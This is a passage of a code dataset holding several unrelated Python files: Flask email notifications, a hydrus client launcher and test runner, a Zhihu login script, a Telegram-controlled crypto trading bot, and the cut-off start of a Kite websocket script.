source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
emails.py
|
# -*- coding: utf-8 -*-
from builtins import str
from flask import render_template,g
from flask_mail import Message
from cineapp import mail, db
from cineapp.models import User
from threading import Thread
from cineapp import app
import html2text, time, json, traceback
# Send mail into a dedicated thread in order to avoir the web app to wait
def send_async_email(app, msg):
with app.app_context():
mail.send(msg)
# Wrapper function for sending mails using flask-mail plugin
def send_email(subject, sender, recipients, text_body):
msg = Message(subject, sender=sender, recipients=recipients)
msg.body = text_body
thr = Thread(target=send_async_email, args=[app, msg])
thr.start()
# Function which sends notifications to users when a show is added
def add_show_notification(show):
users = User.query.all()
for cur_user in users:
# Check if the cur_user is the logged user who added the show
# in order to change the mail text
send_own_activity_mail=True
if cur_user.id==g.user.id:
you_user=True
# Check if we must send an email for user own activity
if cur_user.notifications != None and cur_user.notifications["notif_own_activity"] == False:
send_own_activity_mail=False
else:
you_user=False
# Send the mail if we have too
if cur_user.notifications != None and cur_user.notifications["notif_show_add"] == True and send_own_activity_mail==True:
try:
send_email('[Cineapp] - %s' % g.messages["email_title_add"] , app.config['MAIL_SENDER'],[ cur_user.email ] ,
render_template('add_show_notification.txt', dest_user=cur_user, add_user=g.user,show=show,you_user=you_user))
except Exception as e:
app.logger.error("Impossible d'envoyer le mail d'ajout: %s",e)
return 1
# Function which sends notifications to users when a show is added
def mark_show_notification(mark,notif_type):
users = User.query.filter_by().all()
# Convert the HTML content to text in order to have a nice display in the mail
html_converter = html2text.HTML2Text()
mark.comment=html_converter.handle(mark.comment).strip()
for cur_user in users:
# Check if the cur_user is the logged user who added the show
# in order to change the mail text
send_own_activity_mail=True
if cur_user.id==g.user.id:
you_user=True
# Check if we must send an email for user own activity
if cur_user.notifications != None and cur_user.notifications["notif_own_activity"] == False:
send_own_activity_mail=False
else:
you_user=False
# Send the mail if we have too
if cur_user.notifications != None and cur_user.notifications["notif_show_add"] == True and send_own_activity_mail==True:
try:
if notif_type == "add":
send_email('[Cineapp] - %s' % g.messages["email_title_mark"] , app.config['MAIL_SENDER'],[ cur_user.email ] ,
render_template('mark_show_notification.txt', dest_user=cur_user, add_user=g.user,mark=mark,you_user=you_user,notif_type=notif_type))
elif notif_type == "update":
send_email('[Cineapp] - Note mise à jour' , app.config['MAIL_SENDER'],[ cur_user.email ] ,
render_template('mark_show_notification.txt', dest_user=cur_user, add_user=g.user,mark=mark,you_user=you_user,notif_type=notif_type))
elif notif_type == "homework":
send_email('[Cineapp] - Devoir rempli' , app.config['MAIL_SENDER'],[ cur_user.email ] ,
render_template('mark_show_notification.txt', dest_user=cur_user, add_user=g.user,mark=mark,you_user=you_user,notif_type=notif_type))
return 0
except Exception as e:
app.logger.error("Impossible d'envoyer le mail: %s",e)
return 1
# Everything has been done correctly ==> return 0
return 0
# Function which sends notification to user who received an homework
# For the homework, just send a mail to the user who has to handle the homework.
def add_homework_notification(mark):
# Check if notifications are enabled for the destination user
if mark.user.notifications != None and mark.user.notifications["notif_homework_add"] == True:
try:
send_email('[Cineapp] - Attribution d\'un devoir', app.config['MAIL_SENDER'],[ mark.user.email ],
render_template('add_homework_notification.txt', dest_user=mark.user, homework_who=mark.homework_who_user, show=mark.show))
return 0
except Exception as e:
# We couldn't send the mail
app.logger.error("Impossible d\'envoyer la notification de devoir : %s", e)
app.logger.error("%s" % traceback.print_exc())
return 1
else:
# Display a message that the user don't want to be notified
return 2
# Function which sends notification when an homework has been cancelled
# Send a notification to the user who cancelled the homework and another to
# the destination user the homework was for
def delete_homework_notification(mark):
# Check if notifications are enabled for the user
if mark.user.notifications != None and mark.user.notifications["notif_homework_add"] == True:
try:
send_email('[Cineapp] - Annulation d\'un devoir', app.config['MAIL_SENDER'],[ mark.user.email ],
render_template('_homework_notification.txt', dest_user=mark.user, homework_who=mark.homework_who_user, show=mark.show))
return 0
except:
# We couldn't send the mail
return 1
else:
# Display a message that the user don't want to be notified
return 2
# Function which sends notification to user when a show has been updated into the database
def update_show_notification(notif):
users = User.query.filter_by().all()
for cur_user in users:
# Check if the cur_user is the logged user who added the show
# in order to change the mail text
send_own_activity_mail=True
if cur_user.id==g.user.id:
you_user=True
# Check if we must send an email for user own activity
if cur_user.notifications != None and cur_user.notifications["notif_own_activity"] == False:
send_own_activity_mail=False
else:
you_user=False
# Send the mail if we have too
if cur_user.notifications != None and cur_user.notifications["notif_show_add"] == True and send_own_activity_mail==True:
send_email('[Cineapp] - %s' % g.messages["email_title_update"] , app.config['MAIL_SENDER'],[ cur_user.email ] ,
render_template('update_show_notification.txt', dest_user=cur_user, add_user=g.user,notif=notif,you_user=you_user))
# Function which sends notification to user when a comment has been posted on a mark
def mark_comment_notification(mark_comment,notif_type):
users = User.query.filter_by().all()
# Check if the comment is posted by a user on his own mark
if mark_comment.user.id==mark_comment.mark.user.id:
own_mark_user=True
else:
own_mark_user=False
for cur_user in users:
send_own_activity_mail=True
# Check if the logged user posted the comment
if cur_user.id==g.user.id:
you_user=True
# Check if we must send an email for user own activity
if cur_user.notifications != None and "notif_own_activity" in cur_user.notifications and cur_user.notifications["notif_own_activity"] == False:
send_own_activity_mail=False
else:
you_user=False
# Check if the comment refers to a mark for the logged user
if cur_user.id==mark_comment.mark.user.id:
you_dest_user=True
else:
you_dest_user=False
# Send the mail if we have too
if cur_user.notifications != None and "notif_comment_add" in cur_user.notifications and cur_user.notifications["notif_comment_add"] == True and send_own_activity_mail==True:
# Check the kind of mail we must send considering the notification type
if notif_type == "add_mark_comment":
mail_title = "Ajout d\'un commentaire"
notif_template = "mark_comment_notification.txt"
elif notif_type == "edit_mark_comment":
mail_title = "Modification d\'un commentaire"
notif_template = "mark_update_comment_notification.txt"
elif notif_type == "delete_mark_comment":
mail_title = "Suppression d\'un commentaire"
notif_template = "mark_delete_comment_notification.txt"
send_email('[Cineapp] - ' + mail_title , app.config['MAIL_SENDER'],[ cur_user.email ] ,
render_template(notif_template, dest_user=cur_user, mark_comment=mark_comment, you_user=you_user,you_dest_user=you_dest_user,own_mark_user=own_mark_user))
# Function which sends notification to user when the favorite/star status has been updated for a show
def favorite_update_notification(favorite_show,notif_type):
users = User.query.filter_by().all()
for cur_user in users:
send_own_activity_mail=True
# Check if the logged user posted the comment
if cur_user.id==g.user.id:
you_user=True
# Check if we must send an email for user own activity
if cur_user.notifications != None and "notif_own_activity" in cur_user.notifications and cur_user.notifications["notif_own_activity"] == False:
send_own_activity_mail=False
else:
you_user=False
# Send the mail if we have too
if cur_user.notifications != None and "notif_favorite_update" in cur_user.notifications and cur_user.notifications["notif_favorite_update"] == True and send_own_activity_mail==True:
# Check the kind of mail we must send considering the notification type
if notif_type == "add":
mail_title = g.messages["email_title_favorite_add"]
notif_template = "favorite_update_notification.txt"
elif notif_type == "delete":
mail_title = g.messages["email_title_favorite_delete"]
notif_template = "favorite_update_notification.txt"
send_email('[Cineapp] - ' + mail_title , app.config['MAIL_SENDER'],[ cur_user.email ] ,
render_template(notif_template, dest_user=cur_user, favorite_show=favorite_show, you_user=you_user, notif_type=notif_type))
# Function that sends a notification when a user is named on the chat
def chat_message_notification(message,user):
if user.notifications != None and "notif_chat_message" in user.notifications and user.notifications["notif_chat_message"] == True:
app.logger.info("Sending mail for chat quote to %s " % user.email)
send_email('[Cineapp] - Message depuis le chat' , app.config['MAIL_SENDER'],[ user.email ] ,
render_template('chat_message_notification.txt', dest_user=user, message=message))
|
client.py
|
#!/usr/bin/env python3
# This program is free software. It comes without any warranty, to
# the extent permitted by applicable law. You can redistribute it
# and/or modify it under the terms of the Do What The Fuck You Want
# To Public License, Version 2, as published by Sam Hocevar. See
# http://sam.zoy.org/wtfpl/COPYING for more details.
# import logging
# logging.basicConfig(filename="/mnt/storage2/logging.log", level=logging.DEBUG)
try:
from include import HydrusPy2To3
import wx
HydrusPy2To3.do_2to3_test( wx_error_display_callable = wx.SafeShowMessage )
from include import HydrusExceptions
from include import HydrusConstants as HC
from include import HydrusData
from include import HydrusPaths
import os
import sys
import time
from include import ClientController
import threading
from include import HydrusGlobals as HG
from include import HydrusLogger
import traceback
import faulthandler
faulthandler.enable()
try:
from twisted.internet import reactor
except:
HG.twisted_is_broke = True
#
import argparse
argparser = argparse.ArgumentParser( description = 'hydrus network client (console)' )
argparser.add_argument( '-d', '--db_dir', help = 'set an external db location' )
argparser.add_argument( '--no_daemons', action='store_true', help = 'run without background daemons' )
argparser.add_argument( '--no_wal', action='store_true', help = 'run without WAL db journalling' )
argparser.add_argument( '--no_db_temp_files', action='store_true', help = 'run the db entirely in memory' )
argparser.add_argument( '--temp_dir', help = 'override the program\'s temporary directory' )
result = argparser.parse_args()
if result.db_dir is None:
db_dir = HC.DEFAULT_DB_DIR
if not HydrusPaths.DirectoryIsWritable( db_dir ) or HC.RUNNING_FROM_OSX_APP:
db_dir = HC.USERPATH_DB_DIR
else:
db_dir = result.db_dir
db_dir = HydrusPaths.ConvertPortablePathToAbsPath( db_dir, HC.BASE_DIR )
try:
HydrusPaths.MakeSureDirectoryExists( db_dir )
except:
raise Exception( 'Could not ensure db path "{}" exists! Check the location is correct and that you have permission to write to it!'.format( db_dir ) )
if not os.path.isdir( db_dir ):
raise Exception( 'The given db path "{}" is not a directory!'.format( db_dir ) )
if not HydrusPaths.DirectoryIsWritable( db_dir ):
raise Exception( 'The given db path "{}" is not a writable-to!'.format( db_dir ) )
HG.no_daemons = result.no_daemons
HG.no_wal = result.no_wal
HG.no_db_temp_files = result.no_db_temp_files
if result.temp_dir is not None:
HydrusPaths.SetEnvTempDir( result.temp_dir )
except Exception as e:
import traceback
import os
error_trace = traceback.format_exc()
print( error_trace )
wx.SafeShowMessage( 'critical boot error!', 'Critical boot error occurred! Details written to crash.log!' + os.linesep * 2 + str( e ) )
if 'db_dir' in locals() and os.path.exists( db_dir ):
dest_path = os.path.join( db_dir, 'crash.log' )
with open( dest_path, 'w', encoding = 'utf-8' ) as f:
f.write( error_trace )
print( 'Critical boot error occurred! Details written to crash.log!' )
sys.exit( 1 )
with HydrusLogger.HydrusLogger( db_dir, 'client' ) as logger:
try:
HydrusData.Print( 'hydrus client started' )
if not HG.twisted_is_broke:
threading.Thread( target = reactor.run, name = 'twisted', kwargs = { 'installSignalHandlers' : 0 } ).start()
controller = ClientController.Controller( db_dir )
controller.Run()
except:
HydrusData.Print( 'hydrus client failed' )
HydrusData.Print( traceback.format_exc() )
try:
message = 'The client failed to start. The error follows (it has also been written to the log in the db directory). If it is not obvious, please inform hydrus dev.'
message += os.linesep * 2
message += traceback.format_exc()
wx.SafeShowMessage( 'hydrus client failed', message )
except:
pass
finally:
HG.view_shutdown = True
HG.model_shutdown = True
try:
controller.pubimmediate( 'wake_daemons' )
except:
HydrusData.Print( traceback.format_exc() )
reactor.callFromThread( reactor.stop )
HydrusData.Print( 'hydrus client shut down' )
HG.shutdown_complete = True
if HG.restart:
HydrusData.RestartProcess()
|
zhihu_login.py
|
# -*- coding: utf-8 -*-
import threading
__author__ = 'zkqiang'
__zhihu__ = 'https://www.zhihu.com/people/z-kqiang'
__github__ = 'https://github.com/zkqiang/Zhihu-Login'
import base64
import hashlib
import hmac
import json
import re
import time
from http import cookiejar
from urllib.parse import urlencode
import execjs
import requests
from PIL import Image
class ZhihuAccount(object):
def __init__(self, username: str = None, password: str = None):
self.username = username
self.password = password
self.login_data = {
'client_id': 'c3cef7c66a1843f8b3a9e6a1e3160e20',
'grant_type': 'password',
'source': 'com.zhihu.web',
'username': '',
'password': '',
'lang': 'en',
'ref_source': 'homepage',
'utm_source': ''
}
self.session = requests.session()
self.session.headers = {
'accept-encoding': 'gzip, deflate, br',
'Host': 'www.zhihu.com',
'Referer': 'https://www.zhihu.com/',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 '
'(KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36'
}
self.session.cookies = cookiejar.LWPCookieJar(filename='./cookies.txt')
def login(self, captcha_lang: str = 'en', load_cookies: bool = True):
"""
模拟登录知乎
:param captcha_lang: 验证码类型 'en' or 'cn'
:param load_cookies: 是否读取上次保存的 Cookies
:return: bool
若在 PyCharm 下使用中文验证出现无法点击的问题,
需要在 Settings / Tools / Python Scientific / Show Plots in Toolwindow,取消勾选
"""
if load_cookies and self.load_cookies():
print('读取 Cookies 文件')
if self.check_login():
print('登录成功')
return True
print('Cookies 已过期')
self._check_user_pass()
self.login_data.update({
'username': self.username,
'password': self.password,
'lang': captcha_lang
})
timestamp = int(time.time() * 1000)
self.login_data.update({
'captcha': self._get_captcha(self.login_data['lang']),
'timestamp': timestamp,
'signature': self._get_signature(timestamp)
})
headers = self.session.headers.copy()
headers.update({
'content-type': 'application/x-www-form-urlencoded',
'x-zse-83': '3_1.1',
'x-xsrftoken': self._get_xsrf()
})
data = self._encrypt(self.login_data)
login_api = 'https://www.zhihu.com/api/v3/oauth/sign_in'
resp = self.session.post(login_api, data=data, headers=headers)
if 'error' in resp.text:
print(json.loads(resp.text)['error'])
if self.check_login():
print('登录成功')
return True
print('登录失败')
return False
def load_cookies(self):
"""
读取 Cookies 文件加载到 Session
:return: bool
"""
try:
self.session.cookies.load(ignore_discard=True)
return True
except FileNotFoundError:
return False
def check_login(self):
"""
检查登录状态,访问登录页面出现跳转则是已登录,
如登录成功保存当前 Cookies
:return: bool
"""
login_url = 'https://www.zhihu.com/signup'
resp = self.session.get(login_url, allow_redirects=False)
if resp.status_code == 302:
self.session.cookies.save()
return True
return False
def _get_xsrf(self):
"""
从登录页面获取 xsrf
:return: str
"""
self.session.get('https://www.zhihu.com/', allow_redirects=False)
for c in self.session.cookies:
if c.name == '_xsrf':
return c.value
raise AssertionError('获取 xsrf 失败')
def _get_captcha(self, lang: str):
"""
请求验证码的 API 接口,无论是否需要验证码都需要请求一次
如果需要验证码会返回图片的 base64 编码
根据 lang 参数匹配验证码,需要人工输入
:param lang: 返回验证码的语言(en/cn)
:return: 验证码的 POST 参数
"""
if lang == 'cn':
api = 'https://www.zhihu.com/api/v3/oauth/captcha?lang=cn'
else:
api = 'https://www.zhihu.com/api/v3/oauth/captcha?lang=en'
resp = self.session.get(api)
show_captcha = re.search(r'true', resp.text)
if show_captcha:
put_resp = self.session.put(api)
json_data = json.loads(put_resp.text)
img_base64 = json_data['img_base64'].replace(r'\n', '')
with open('./captcha.jpg', 'wb') as f:
f.write(base64.b64decode(img_base64))
img = Image.open('./captcha.jpg')
if lang == 'cn':
import matplotlib.pyplot as plt
plt.imshow(img)
print('点击所有倒立的汉字,在命令行中按回车提交')
points = plt.ginput(7)
capt = json.dumps({'img_size': [200, 44],
'input_points': [[i[0] / 2, i[1] / 2] for i in points]})
else:
img_thread = threading.Thread(target=img.show, daemon=True)
img_thread.start()
capt = input('请输入图片里的验证码:')
# 这里必须先把参数 POST 验证码接口
self.session.post(api, data={'input_text': capt})
return capt
return ''
def _get_signature(self, timestamp: int or str):
"""
通过 Hmac 算法计算返回签名
实际是几个固定字符串加时间戳
:param timestamp: 时间戳
:return: 签名
"""
ha = hmac.new(b'd1b964811afb40118a12068ff74a12f4', digestmod=hashlib.sha1)
grant_type = self.login_data['grant_type']
client_id = self.login_data['client_id']
source = self.login_data['source']
ha.update(bytes((grant_type + client_id + source + str(timestamp)), 'utf-8'))
return ha.hexdigest()
def _check_user_pass(self):
"""
检查用户名和密码是否已输入,若无则手动输入
"""
if not self.username:
self.username = input('请输入手机号:')
if self.username.isdigit() and '+86' not in self.username:
self.username = '+86' + self.username
if not self.password:
self.password = input('请输入密码:')
@staticmethod
def _encrypt(form_data: dict):
with open('./encrypt.js') as f:
js = execjs.compile(f.read())
return js.call('Q', urlencode(form_data))
if __name__ == '__main__':
account = ZhihuAccount('', '')
account.login(captcha_lang='en', load_cookies=True)
|
test.py
|
#!/usr/bin/env python3
from hydrus import QtPorting as QP
from qtpy import QtWidgets as QW
from qtpy import QtCore as QC
import locale
try: locale.setlocale( locale.LC_ALL, '' )
except: pass
from hydrus import HydrusConstants as HC
from hydrus import HydrusData
from hydrus import HydrusGlobals as HG
from hydrus import TestController
import sys
import threading
import traceback
from twisted.internet import reactor
if __name__ == '__main__':
args = sys.argv[1:]
if len( args ) > 0:
only_run = args[0]
else:
only_run = None
try:
threading.Thread( target = reactor.run, kwargs = { 'installSignalHandlers' : 0 } ).start()
QP.MonkeyPatchMissingMethods()
app = QW.QApplication( sys.argv )
app.call_after_catcher = QP.CallAfterEventCatcher( app )
try:
# we run the tests on the Qt thread atm
# keep a window alive the whole time so the app doesn't finish its mainloop
win = QW.QWidget( None )
win.setWindowTitle( 'Running tests...' )
controller = TestController.Controller( win, only_run )
def do_it():
controller.Run( win )
QP.CallAfter( do_it )
app.exec_()
except:
HydrusData.DebugPrint( traceback.format_exc() )
finally:
HG.view_shutdown = True
controller.pubimmediate( 'wake_daemons' )
HG.model_shutdown = True
controller.pubimmediate( 'wake_daemons' )
controller.TidyUp()
except:
HydrusData.DebugPrint( traceback.format_exc() )
finally:
reactor.callFromThread( reactor.stop )
print( 'This was version ' + str( HC.SOFTWARE_VERSION ) )
input()
|
telegram_controller.py
|
"""텔래그램 챗봇을 활용한 시스템 운영 인터페이스
Operator를 사용해서 시스템을 컨트롤하는 모듈
"""
import os
import signal
import time
import threading
import json
from urllib import parse
import requests
from dotenv import load_dotenv
from . import (
LogManager,
Analyzer,
UpbitTrader,
UpbitDataProvider,
BithumbTrader,
BithumbDataProvider,
Worker,
StrategyBuyAndHold,
StrategySma0,
Operator,
)
load_dotenv()
class TelegramController:
"""smtm 탤래그램 챗봇 컨트롤러"""
API_HOST = "https://api.telegram.org/"
TEST_FILE = "data/telegram_chatbot.jpg"
TOKEN = os.environ.get("TELEGRAM_BOT_TOKEN", "telegram_token")
CHAT_ID = int(os.environ.get("TELEGRAM_CHAT_ID", "123456"))
POLLING_TIMEOUT = 10
INTERVAL = 60
GUIDE_READY = "자동 거래 시작 전입니다.\n명령어를 입력해주세요.\n\n"
GUIDE_RUNNING = "자동 거래 운영 중입니다.\n명령어를 입력해주세요.\n\n"
def __init__(self):
LogManager.set_stream_level(30)
self.logger = LogManager.get_logger("TelegramController")
self.post_worker = Worker("Chatbot-Post-Worker")
self.post_worker.start()
# chatbot variable
self.terminating = False
self.last_update_id = 0
self.in_progress = None
self.in_progress_step = 0
self.main_keyboard = None
self.setup_list = []
self.score_query_list = []
# smtm variable
self.operator = None
self.budget = None
self.strategy = None
self.data_provider = None
self.trader = None
self.command_list = []
self._create_command()
self.currency = None
def _create_command(self):
"""명령어 정보를 생성한다"""
self.command_list = [
{
"guide": "1. 시작 - 자동 거래 시작",
"cmd": ["시작", "1", "1. 시작"],
"action": self._start_trading,
},
{
"guide": "2. 중지 - 자동 거래 중지",
"cmd": ["중지", "2", "2. 중지"],
"action": self._stop_trading,
},
{
"guide": "3. 상태 조회 - 운영 상태 조회",
"cmd": ["상태", "3", "3. 상태 조회", "상태 조회"],
"action": self._query_state,
},
{
"guide": "4. 수익률 조회 - 기간별 수익률 조회",
"cmd": ["수익", "4", "수익률 조회", "4. 수익률 조회"],
"action": self._query_score,
},
{
"guide": "5. 거래내역 조회 - 모든 거래내역 조회",
"cmd": ["거래", "5", "거래내역 조회", "5. 거래내역 조회"],
"action": self._query_trading_records,
},
]
main_keyboard = {
"keyboard": [
[{"text": "1. 시작"}, {"text": "2. 중지"}],
[{"text": "3. 상태 조회"}, {"text": "4. 수익률 조회"}, {"text": "5. 거래내역 조회"}],
]
}
main_keyboard = json.dumps(main_keyboard)
self.main_keyboard = parse.quote(main_keyboard)
self.setup_list = [
{"guide": "운영 예산을 정해주세요", "keyboard": ["50000", "100000", "500000", "1000000"]},
{"guide": "거래할 화폐를 정해주세요", "keyboard": ["BTC", "ETH"]},
{"guide": "거래소를 선택해 주세요", "keyboard": ["1. Upbit", "2. Bithumb"]},
{"guide": "전략을 선택해 주세요", "keyboard": ["1. Buy and Hold", "2. Simple Moving Average"]},
{"guide": "자동 거래를 시작할까요?", "keyboard": ["1. Yes", "2. No"]},
]
self._convert_keyboard_markup(self.setup_list)
self.score_query_list = [
{
"guide": "조회할 기간을 정해주세요",
"keyboard": [
"1. 최근 6시간",
"2. 최근 12시간",
"3. 최근 24시간",
"4. 24시간 전부터 12시간",
"5. 48시간 전부터 24시간",
],
},
]
self._convert_keyboard_markup(self.score_query_list)
@staticmethod
def _convert_keyboard_markup(setup_list):
for item in setup_list:
markup = {"keyboard": []}
for key in item["keyboard"]:
markup["keyboard"].append([{"text": key}])
markup = json.dumps(markup)
item["keyboard"] = parse.quote(markup)
def main(self):
"""main 함수"""
print("##### smtm telegram controller is started #####")
signal.signal(signal.SIGINT, self._terminate)
signal.signal(signal.SIGTERM, self._terminate)
self._start_get_updates_loop()
while not self.terminating:
try:
time.sleep(0.5)
except EOFError:
break
def _start_get_updates_loop(self):
"""반복적 텔레그램 메세지를 확인하는 쓰레드 관리"""
def looper():
self.logger.debug(f"start get updates thread: {threading.get_ident()}")
while not self.terminating:
self._handle_message()
get_updates_thread = threading.Thread(target=looper, name="get updates", daemon=True)
get_updates_thread.start()
def _handle_message(self):
"""텔레그램 메세지를 확인해서 명령어를 처리"""
updates = self._get_updates()
try:
if updates is not None and updates["ok"]:
for result in updates["result"]:
self.logger.debug(f'result: {result["message"]["chat"]["id"]} : {self.CHAT_ID}')
if result["message"]["chat"]["id"] != self.CHAT_ID:
continue
if "text" in result["message"]:
self._execute_command(result["message"]["text"])
self.last_update_id = result["update_id"]
except (ValueError, KeyError):
self.logger.error("Invalid data from server")
def _execute_command(self, command):
self.logger.debug(f"_execute_command: {command}")
found = False
try:
if self.in_progress is not None:
self.in_progress(command)
return
except TypeError:
self.logger.debug("invalid in_progress")
for item in self.command_list:
if command in item["cmd"]:
found = True
item["action"](command)
if not found:
if self.operator is None:
message = self.GUIDE_READY
else:
message = self.GUIDE_RUNNING
for item in self.command_list:
message += item["guide"] + "\n"
self._send_text_message(message, self.main_keyboard)
def _send_text_message(self, text, keyboard=None):
encoded_text = parse.quote(text)
if keyboard is not None:
url = f"{self.API_HOST}{self.TOKEN}/sendMessage?chat_id={self.CHAT_ID}&text={encoded_text}&reply_markup={keyboard}"
else:
url = f"{self.API_HOST}{self.TOKEN}/sendMessage?chat_id={self.CHAT_ID}&text={encoded_text}"
def send_message(task):
self._send_http(task["url"])
self.post_worker.post_task({"runnable": send_message, "url": url})
def _send_image_message(self, file):
url = f"{self.API_HOST}{self.TOKEN}/sendPhoto?chat_id={self.CHAT_ID}"
def send_image(task):
self._send_http(task["url"], True, task["file"])
self.post_worker.post_task({"runnable": send_image, "url": url, "file": file})
def _get_updates(self):
"""getUpdates API로 새로운 메세지를 가져오기"""
offset = self.last_update_id + 1
return self._send_http(
f"{self.API_HOST}{self.TOKEN}/getUpdates?offset={offset}&timeout={self.POLLING_TIMEOUT}"
)
def _send_http(self, url, is_post=False, file=None):
try:
if is_post:
if file is not None:
with open(file, "rb") as image_file:
response = requests.post(url, files={"photo": image_file})
else:
response = requests.post(url)
else:
response = requests.get(url)
response.raise_for_status()
result = response.json()
except ValueError:
self.logger.error("Invalid data from server")
return None
except requests.exceptions.HTTPError as msg:
self.logger.error(msg)
return None
except requests.exceptions.RequestException as msg:
self.logger.error(msg)
return None
return result
def _start_trading(self, command):
"""초기화 후 자동 거래 시작"""
not_ok = True
message = ""
if self.in_progress_step == 0:
not_ok = False
elif self.in_progress_step == 1:
try:
self.budget = int(command)
not_ok = False
except ValueError:
self.logger.info(f"invalid budget {command}")
elif self.in_progress_step == 2:
if command.upper() == "BTC":
self.currency = "BTC"
not_ok = False
elif command.upper() == "ETH":
self.currency = "ETH"
not_ok = False
elif self.in_progress_step == 3:
if command.upper() in ["1. UPBIT", "1", "UPBIT"]:
self.data_provider = UpbitDataProvider(currency=self.currency)
self.trader = UpbitTrader(budget=self.budget, currency=self.currency)
not_ok = False
elif command.upper() in ["2. BITHUMB", "2", "BITHUMB"]:
self.data_provider = BithumbDataProvider(currency=self.currency)
self.trader = BithumbTrader(budget=self.budget, currency=self.currency)
not_ok = False
elif self.in_progress_step == 4:
if command.upper() in ["1. BUY AND HOLD", "1", "BUY AND HOLD", "BNH"]:
self.strategy = StrategyBuyAndHold()
not_ok = False
elif command.upper() in [
"2. SIMPLE MOVING AVERAGE",
"2",
"SIMPLE MOVING AVERAGE",
"SMA",
]:
self.strategy = StrategySma0()
not_ok = False
if not not_ok:
message = "".join(
[
f"화폐: {self.currency}\n",
f"전략: {self.strategy.NAME}\n",
f"거래소: {self.trader.NAME}\n",
f"예산: {self.budget}\n",
]
)
elif self.in_progress_step == len(self.setup_list) and command.upper() in [
"1. YES",
"1",
"Y",
"YES",
]:
self.operator = Operator()
self.operator.initialize(
self.data_provider,
self.strategy,
self.trader,
Analyzer(),
budget=self.budget,
)
self.operator.set_interval(self.INTERVAL)
if self.operator.start():
start_message = [
"자동 거래가 시작되었습니다!\n",
f"화폐: {self.currency}\n",
f"전략: {self.strategy.NAME}\n",
f"거래소: {self.trader.NAME}\n",
f"예산: {self.budget}\n",
f"거래 간격: {self.INTERVAL}",
]
self._send_text_message("".join(start_message), self.main_keyboard)
self.logger.info(
f"## START! strategy: {self.strategy.NAME} , trader: {self.trader.NAME}"
)
self.in_progress = None
self.in_progress_step = 0
return
if not_ok or self.in_progress_step >= len(self.setup_list):
self._terminate_start_in_progress()
return
message += self.setup_list[self.in_progress_step]["guide"]
keyboard = self.setup_list[self.in_progress_step]["keyboard"]
self._send_text_message(message, keyboard)
self.in_progress = self._start_trading
self.in_progress_step += 1
def _terminate_start_in_progress(self):
self.in_progress = None
self.in_progress_step = 0
self.operator = None
self.budget = None
self.strategy = None
self.data_provider = None
self.trader = None
self._send_text_message("자동 거래가 시작되지 않았습니다.\n처음부터 다시 시작해주세요", self.main_keyboard)
def _stop_trading(self, command):
"""자동 거래 중지"""
del command
if self.operator is not None:
self.operator.stop()
self.in_progress = None
self.in_progress_step = 0
self.operator = None
self.budget = None
self.strategy = None
self.data_provider = None
self.trader = None
self._send_text_message("자동 거래가 중지되었습니다", self.main_keyboard)
def _query_state(self, command):
"""현재 상태를 메세지로 전송"""
del command
if self.operator is None:
message = "자동 거래 시작 전입니다"
else:
message = "자동 거래 운영 중입니다"
self._send_text_message(message)
def _query_score(self, command):
"""구간 수익률과 그래프를 메세지로 전송
"1. 최근 6시간"
"2. 최근 12시간"
"3. 최근 24시간"
"4. 24시간 전부터 12시간"
"5. 48시간 전부터 24시간"
"""
query_list = {
"1. 최근 6시간": (60 * 6, -1),
"2. 최근 12시간": (60 * 12, -1),
"3. 최근 24시간": (60 * 24, -1),
"4. 24시간 전부터 12시간": (60 * 12, -2),
"5. 48시간 전부터 24시간": (60 * 24, -2),
"1": (60 * 6, -1),
"2": (60 * 12, -1),
"3": (60 * 24, -1),
"4": (60 * 12, -2),
"5": (60 * 24, -2),
}
not_ok = True
if self.operator is None:
self._send_text_message("자동 거래 운영중이 아닙니다", self.main_keyboard)
return
message = ""
if self.in_progress_step == 1:
if command in query_list.keys():
def print_score_and_main_statement(score):
if score is None:
self._send_text_message("수익률 조회중 문제가 발생하였습니다.", self.main_keyboard)
return
score_message = [
f"자산 {score[0]} -> {score[1]}\n",
f"누적수익률 {score[2]}\n",
f"비교수익률 {score[3]}\n",
]
self._send_text_message("".join(score_message), self.main_keyboard)
if len(score) > 4 and score[4] is not None:
self._send_image_message(score[4])
self.operator.get_score(print_score_and_main_statement, query_list[command])
not_ok = False
if self.in_progress_step >= len(self.score_query_list):
self.in_progress = None
self.in_progress_step = 0
if not_ok:
self._send_text_message("다시 시작해 주세요", self.main_keyboard)
else:
self._send_text_message("조회중입니다", self.main_keyboard)
return
message += self.score_query_list[self.in_progress_step]["guide"]
keyboard = self.score_query_list[self.in_progress_step]["keyboard"]
self._send_text_message(message, keyboard)
self.in_progress = self._query_score
self.in_progress_step += 1
def _query_trading_records(self, command):
"""현재까지 거래 기록을 메세지로 전송"""
del command
if self.operator is None:
self._send_text_message("자동 거래 운영중이 아닙니다", self.main_keyboard)
return
results = self.operator.get_trading_results()
if results is None or len(results) == 0:
self._send_text_message("거래 기록이 없습니다", self.main_keyboard)
return
message = []
for result in results:
message.append(f"@{result['date_time']}, {result['type']}\n")
message.append(f"{result['price']} x {result['amount']}\n")
message.append(f"총 {len(results)}건의 거래")
self._send_text_message("".join(message), self.main_keyboard)
def _terminate(self, signum=None, frame=None):
"""프로그램 종료"""
del frame
self.terminating = True
self.post_worker.stop()
if signum is not None:
print("강제 종료 신호 감지")
print("프로그램 종료 중.....")
print("Good Bye~")
|
kite_wbsk_mom.py
|
import datetime
import time
import json
from multiprocessing import Process, Queue
from queuemap import QueueMap
from threading import Thread
import pytz
import requests
from dotenv import load_dotenv, find_dotenv
from kiteconnect import KiteTicker
from kiteconnect import KiteConnect
from config import EnvConfig
from queuemap import QueueMap
from setup_logger import logger
import pandas as pd
NSE_SBIN_INSTRUMENT_TOKEN = 779521
CLOCK_FREQ = 1
TIME_IN_SEC = 0
CORR_TIME_IN_SEC = 0
#Added for the volatiltiy
VOL_TIME_IN_SEC = 0
EPS = 3
tokens_subset=[]
enclosure_queue = Queue()
qm=QueueMap(window=30)
#Muted the URL to send data
UPDATE_TOKEN_URL = 'http://0.0.0.0:8005/kite/update_token'
TRADE_URL = 'http://localhost:8005/kite/trade'
CORR_URL = 'http://localhost:8005/kite/adjust_corr'
CORR_URL_2 = 'http://localhost:8005/kite/adjust_longterm_2'
CORR_URL_STAG = 'http://localhost:8005/kite/adjust_stag'
VOL_URL = 'http://localhost:8005/kite/adjust_volatility'
VOL_URL_3 = 'http://localhost:8005/kite/adjust_volatility_3'
